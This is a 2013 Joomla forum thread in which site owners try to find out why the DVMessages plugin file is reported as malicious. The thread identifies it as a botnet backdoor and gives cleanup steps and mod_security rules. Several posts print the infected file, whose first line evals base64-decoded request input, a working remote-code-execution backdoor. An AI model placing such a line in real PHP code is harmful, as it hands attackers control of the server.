Page 1 of 1
dvmessages.php is being reported as phishing file?
Posted: Wed Feb 20, 2013 10:15 pm
by stryka
Is dvmessages.php a valid joomla file? My host is claiming abuse notices from Bank of America and we have double checked everything and have not found any updated files...
We did notice that the joomla error logs are not being populate as of recently...not sure how to get that going again but the path in site config seems find
We did find a few of the following in the raw logs...
184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
We currently using Akeeba admin to turn off site temporarily
so if you can tell us how to get loggin back on and what else i should check...
thanks
Re: dvmessages.php is being reported as phishing file?
Posted: Sat Feb 23, 2013 11:18 am
by rozahonar
I have sort of the same question. The server that we have contract with, send us an email.
It claims that 'dvmessages.php' in 'plugins/system/dvmessages.php' path is a malware. Do you have any experience about this?
I 'm looking forward to your answers.
Regards,
Re: dvmessages.php is being reported as phishing file?
Posted: Sat Feb 23, 2013 12:17 pm
by mandville
is this an extension plugin for
http://extensions.joomla.org/extensions ... ames/10999
what are the contents of the file
as for your logging issues, try and delete the current log file and see if that will restart it. check the logging settings with your host
Re: dvmessages.php is being reported as phishing file?
Posted: Tue Feb 26, 2013 2:19 pm
by pera
this is second time I get notice from
Abuse Team
Bank of America
The code of the file is:
Code: Select all
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
var $message;
function plgSystemDVMessages(& $subject, $config) {
parent::__construct($subject, $config);
}
function onAfterInitialise()
{
global $_PROFILER, $mainframe, $database, $_SESSION;
$plugin =& JPluginHelper::getPlugin('system', 'dvmessages');
$pluginParams = new JParameter( $plugin->params );
$document = &JFactory::getDocument();
$temps = $mainframe->getMessageQueue();
if ($temps) {
foreach($temps as $temp) {
if ($temp['message'] != '') {
$messages = $temp;
}
}
}
if ($messages) {
if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
!$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
$type = '';
if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
$type = 'info';
} elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
$type = 'alert';
} elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
$type = 'error';
} elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
$type = 'info';
}
if ($type != '') {
JHTML::_('behavior.mootools');
$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
$document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
$document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
$document->addScriptDeclaration("
jQuery.noConflict();
jQuery(document).ready(function(){
Sexy.$type('".addslashes($messages['message'])."');
});
");
if ($pluginParams->get('hide_css', 1)) {
$document->addScriptDeclaration("
jQuery.noConflict();
jQuery(document).ready(function(){
document.getElementById('system-message').style.display = 'none';
});
");
}
}
}
}
return true;
}
}
The abuse team advice me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get
Code: Select all
[root@srv5 dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
Any advice?
Re: dvmessages.php is being reported as phishing file?
Posted: Tue Feb 26, 2013 6:45 pm
by annalanga
Hello,
Oh so I`m not the only one having this problem then
I got a message today from my host stating there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. Can not recall installing mentioned extension. Is it possible it came with anything else?
Now when I`m checking plugins folder there is no sign of dvmessages. How weird?
Re: dvmessages.php is being reported as phishing file?
Posted: Tue Feb 26, 2013 8:37 pm
by ionut
@pera the first line
Code: Select all
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
for sure doesn't look nice.
Re: dvmessages.php is being reported as phishing file?
Posted: Tue Feb 26, 2013 10:38 pm
by kadukeitor
My hosting provider just sent me a similar warning, is a cyber attack? , I see nothing strange in the code ... Please anyone can tell me where is the attack?
Re: dvmessages.php is being reported as phishing file?
Posted: Wed Feb 27, 2013 3:39 pm
by pera
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
Code: Select all
<?php
/**
*/
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
jimport( 'joomla.plugin.plugin' );
But on the "infected" dvmessages.php
Code: Select all
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
This old plugin for Joomla 1.5... best is to not use it or?
Re: dvmessages.php is being reported as phishing file?
Posted: Wed Feb 27, 2013 6:53 pm
by PhilD
Well obviously (based on posted code) the code is now part of a larger hack with likely more files installed somewhere on the site.
My advice is to disable, and completely remove all traces of the plugin and also your (everyone jumping on with a me too) going to have to follow the advice and procedures here:
http://forum.joomla.org/viewtopic.php?f=621&t=582854 in order to properly remove the hack, clean the site(s).
I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the sites insecurity, but until you know for sure don't use it.
Re: dvmessages.php is being reported as phishing file?
Posted: Fri Mar 08, 2013 3:25 am
by Dumdeedum
This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administrate your own server (i.e. a VPS, dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example on how you might be able to do that.
http://www.techrepublic.com/blog/openso ... -linux/171
Re: dvmessages.php is being reported as phishing file?
Posted: Thu Mar 21, 2013 12:29 pm
by kevinm2
your server is now part of a botnet if you have this file (or others)
http://www.prolexic .com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html
itsokbronoproblem botnet uses these files ...
If you have these files on your Joomla (or wordpress) then your installation has been comprimised by the automated attack tools the botnet uses,, this would mean you have old versions of Joomla or wordpress installed.
You need to update Joomla / Wordpress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / comprimised back doors.
Re: dvmessages.php is being reported as phishing file?
Posted: Fri Mar 22, 2013 9:21 pm
by skate323k137
This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.
According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
Code: Select all
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );
The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).
Re: dvmessages.php is being reported as phishing file?
Posted: Thu Mar 28, 2013 5:05 pm
by Sampao
skate323k137 wrote:This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.
According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
Code: Select all
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );
The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).
So, we're all in the same boat ... Three of my sites have been attacked and my host company sent me several complaints from Bank of America. Also on my sites plugins/system/dvsmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My joomla install is marked as updated, except on one site where I have to update manually.
Sorry to ask: "Upgrade your software" >> which software, please?
This is what my dvmessages,php file contains now:
params ); $document = &JFactory::getDocument(); $temps = $mainframe->getMessageQueue(); if ($temps) { foreach($temps as $temp) { if ($temp['message'] != '') { $messages = $temp; } } } if ($messages) { if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) || !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) { $type = ''; if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) { $type = 'info'; } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) { $type = 'alert'; } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) { $type = 'error'; } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) { $type = 'info'; } if ($type != '') { JHTML::_('behavior.mootools'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js'); $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css'); $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ Sexy.$type('".addslashes($messages['message'])."'); }); "); if ($pluginParams->get('hide_css', 1)) { $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ document.getElementById('system-message').style.display = 'none'; }); "); } } } } return true; } }
Re: dvmessages.php is being reported as phishing file?
Posted: Thu Mar 28, 2013 5:20 pm
by skate323k137
The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment like on a cPanel server with other customers? If so you should ask your host if they've applied a patch to prevent cross-account symbolic links.
If you have root access you should install configserver firewall and mod_security. Configserver firewall will block IP's that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:
Code: Select all
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"
Change domain.com to the site being attacked. If it affects several sites just make it a one-line rule:
Code: Select all
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"
Re: dvmessages.php is being reported as phishing file?
Posted: Thu Mar 28, 2013 5:49 pm
by Sampao
to skate323k137:
was that last message for me? If yes, I can't follow your instructions, honestly.
Re: dvmessages.php is being reported as phishing file?
Posted: Thu Mar 28, 2013 6:36 pm
by skate323k137
It was, though it will help anyone in this situation if they are on a linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or Dedicated server?)
Re: dvmessages.php is being reported as phishing file?
Posted: Mon Apr 01, 2013 7:07 am
by chm289
Re: dvmessages.php is being reported as phishing file?
Posted: Fri Apr 26, 2013 7:11 am
by PseudZ
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.
Thanks
Re: dvmessages.php is being reported as phishing file?
Posted: Thu May 09, 2013 5:11 pm
by horus_68
PseudZ wrote:What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.
Thanks
The extension reported here is
DVMessages -
http://archive.extensions.joomla.org/ex ... ames/10999